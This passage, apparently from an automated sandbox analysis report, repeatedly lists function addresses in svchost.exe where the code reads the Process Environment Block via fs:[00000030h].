                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h]2_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]2_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]2_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]2_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]2_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]2_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]2_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]2_2_03C364AB
